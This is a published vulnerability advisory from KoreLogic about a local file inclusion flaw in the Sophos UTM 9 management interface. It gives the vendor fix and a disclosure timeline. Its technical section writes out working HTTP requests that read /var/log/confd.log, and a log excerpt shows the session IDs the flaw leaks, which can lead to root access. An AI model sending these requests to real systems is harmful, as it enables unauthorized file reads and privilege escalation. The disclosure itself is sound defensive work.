Sophos UTM 9 Management Application Local File Inclusion

2017-10-24T00:00:00
ID KL-001-2017-021
Type korelogic
Reporter Matt Bergin (@thatguylevel)
Modified 2017-10-24T00:00:00

Description

Title: Sophos UTM 9 Management Application Local File Inclusion Advisory ID: KL-001-2017-021 Publication Date: 2017.10.24 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-021.txt

  1. Vulnerability Details

    Affected Vendor: Sophos Affected Product: UTM 9 Affected Version: 9.410 Platform: Embedded Linux CWE Classification: CWE-538: File and Directory Information Exposure, CWE-264: Permissions, Privileges, and Access Controls, CWE-532: Information Exposure Through Log Files Impact: Information Disclosure Attack vector: HTTP

  2. Vulnerability Description

    Any user is has log viewing rights provisioned can read arbitrary files from the local filesystem as a limited privilege user. This can be used to read the confd log file and obtain root privilege SID values.

  3. Technical Description

    Any user who has permission to access the 'Logging & Reporting' functionality within the management application can read arbitrary files.

    POST /webadmin.plx HTTP/1.1 Host: 1.3.3.7:4444 Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.5.1.1 Content-Type: application/json; charset=UTF-8 Content-Length: 313 Cookie: SID=SoCKGdoKFmeobxZTEWDz DNT: 1 Connection: close

    {"objs": [{"filename": "/var/log/confd.log", "FID": "log_download_single"}], "SID": "SoCKGdoKFmeobxZTEWDz", "browser": "gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID": "1491835733989_0.7813499665507969", "current_uuid": "189fb61e-e01b-11da-8017-0014221e9eba", "ipv6": false}

    HTTP/1.1 200 OK Date: Mon, 10 Apr 2017 07:49:51 GMT Server: Apache Expires: Thursday, 01-Jan-1970 00:00:01 GMT Pragma: no-cache X-Frame-Options: SAMEORIGIN X-Content-Type-Option: nosniff X-XSS-Protection: 1; mode=block Vary: Accept-Encoding Connection: close Content-Type: application/json; charset=utf-8 Content-Length: 605

    {"SID":"SoCKGdoKFmeobxZTEWDz","ipv6":false,"current_uuid":"189fb61e-e01b-11da-8017-0014221e9eba","browser":"gecko","RID":"1491835733989_0.7813499665507969","js":"if($(\"topbar_icon\")){$(\"topbar_icon\").src=\"core/img/topbar/topbar_user.png\";}toggle_who_is_watching(0);","backend_version":"2","loc":"english","globals_data":["SoCKGdoKFmeobxZTEWDz"],"globals":["SID"],"objs":[{"current_uuid":"189fb61e-e01b-11da-8017-0014221e9eba","FID":"log_download_single","filename":"/var/log/confd.log","js":"start_download('var/SoCKGdoKFmeobxZTEWDz/downloads/singlelogfile/confd-debug.log');"}],"_cookie":null,"wdebug":0}

    The start_download() function is JavaScript loaded into the browser. This function takes the given parameter and uses it to build the subsequent HTTP GET request.

    GET /var/SoCKGdoKFmeobxZTEWDz/downloads/singlelogfile/confd-debug.log HTTP/1.1 Host: 1.3.3.7:4444 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: https://1.3.3.7:4444/ Cookie: SID=SoCKGdoKFmeobxZTEWDz DNT: 1 Connection: close Upgrade-Insecure-Requests: 1

    HTTP/1.1 200 OK Date: Mon, 10 Apr 2017 07:51:02 GMT Server: Apache X-Frame-Options: SAMEORIGIN X-Content-Type-Option: nosniff X-XSS-Protection: 1; mode=block Cache-Control: max-age=31536000 Expires: Tue, 10 Apr 2018 07:51:02 GMT Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=utf-8 Content-Length: 2595127

    2017:04:02-00:00:01 hostname confd[28056]: D Role::authenticate:185() => id="3106" severity="debug" sys="System" sub="confd" name="authentication successful" user="system" srcip="127.0.0.1" sid="oLwZJzlZQcXRrgpDZtwv" facility="system" client="ips-reporter.pl" call="new"<31>Apr 2 00:00:01 confd[28056]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="ips-reporter.pl" lock="none" method="get_SID" 2017:04:02-00:00:01 hostname confd[28056]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="ips-reporter.pl" lock="none" method="signal_unsubscribe" 2017:04:02-00:00:01 hostname confd[28056]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="ips-reporter.pl" lock="none" method="logout" 2017:04:02-00:00:01 hostname confd[28056]: D Session::terminate:290() => id="3100" severity="debug" sys="System" sub="confd" name="closing session" user="system" srcip="127.0.0.1" sid="oLwZJzlZQcXRrgpDZtwv" facility="system" client="ips-reporter.pl" call="logout" function="logout" 2017:04:02-00:00:01 hostname confd[28056]: D sys::DESTROY:231() => id="3100" severity="debug" sys="System" sub="confd" name="worker process exiting" user="system" srcip="127.0.0.1" facility="system" client="ips-reporter.pl" 2017:04:02-00:00:01 hostname confd[28070]: D Role::authenticate:185() => id="3106" severity="debug" sys="System" sub="confd" name="authentication successful" user="system" srcip="127.0.0.1" sid="sJpVhmspOPKYYxNAcfEj" facility="system" client="spx-password-expire" call="new"<31>Apr 2 00:00:01 confd[28070]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="spx-password-expire" lock="none" method="get_SID" 2017:04:02-00:00:01 hostname confd[28070]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="spx-password-expire" lock="none" method="get" 2017:04:02-00:00:01 hostname confd[28070]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="spx-password-expire" lock="none" method="logout" 2017:04:02-00:00:01 hostname confd[28070]: D Session::terminate:290() => id="3100" severity="debug" sys="System" sub="confd" name="closing session" user="system" srcip="127.0.0.1" sid="sJpVhmspOPKYYxNAcfEj" facility="system" client="spx-password-expire" call="logout" function="logout" 2017:04:02-00:00:02 hostname confd[28070]: D sys::DESTROY:231() => id="3100" severity="debug" sys="System" sub="confd" name="worker process exiting" user="system" srcip="127.0.0.1" facility="system" client="spx-password-expire" 2017:04:02-00:00:01 hostname confd[28083]: D Role::authenticate:185() => id="3106" severity="debug" sys="System" sub="confd" name="authentication successful" user="system" srcip="127.0.0.1" sid="bgpZDQBWHcNGvvQKTjPj" facility="system" client="admin-reporter.pl" call="new"<31>Apr 2 00:00:02 confd[28083]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="admin-reporter.pl" lock="none" method="get_SID" 2017:04:02-00:00:01 hostname confd[28086]: D Role::authenticate:185() => id="3106" severity="debug" sys="System" sub="confd" name="authentication successful" user="system" srcip="127.0.0.1" sid="BXeDpxEvboHeDEmaaHEY" facility="system" client="vpnreporter" call="new"<31>Apr 2 00:00:02 confd[28086]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="vpnreporter" lock="none" method="get_SID" 2017:04:02-00:00:01 hostname confd[28088]: D Role::authenticate:185() => id="3106" severity="debug" sys="System" sub="confd" name="authentication successful" user="system" srcip="127.0.0.1" sid="SBggtglcePoJTWtmkIMO" facility="system" client="websecreporter" call="new"<31>Apr 2 00:00:02 confd[28088]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="websecreporter" lock="none" method="get_SID" 2017:04:02-00:00:02 hostname confd[28086]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="vpnreporter" lock="none" method="signal_subscribe" 2017:04:02-00:00:02 hostname confd[28083]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="admin-reporter.pl" lock="none" method="signal_unsubscribe" 2017:04:02-00:00:02 hostname confd[28088]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="websecreporter" lock="none" method="signal_subscribe" 2017:04:02-00:00:02 hostname confd[28083]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="admin-reporter.pl" lock="none" method="logout" 2017:04:02-00:00:02 hostname confd[28083]: D Session::terminate:290() => id="3100" severity="debug" sys="System" sub="confd" name="closing session" user="system" srcip="127.0.0.1" sid="bgpZDQBWHcNGvvQKTjPj" facility="system" client="admin-reporter.pl" call="logout" function="logout" ... ...

    The logging of 'sid' values is also dangerous because it leaks session identifiers who may be of higher privilege. A 'sid' for the admin account can be used to change the root and loginuser passwords.

  4. Mitigation and Remediation Recommendation

    The vendor has addressed this vulnerability in version 9.503. Release notes and download instructions can be found at: https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-503-released

  5. Credit

    This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

  6. Disclosure Timeline

    2017.07.21 - KoreLogic submits vulnerability details to Sophos. 2017.07.21 - Sophos acknowledges receipt. 2017.09.01 - 30 business days have elapsed since the vulnerability was reported to Sophos. 2017.09.15 - KoreLogic requests an update on the status of this and other vulnerabilities reported to Sophos. 2017.09.18 - Sophos informs KoreLogic that this issue has been remediated in release 9.503 for UTM. 2017.10.24 - KoreLogic public disclosure.

  7. Proof of Concept

    See 3. Technical Description.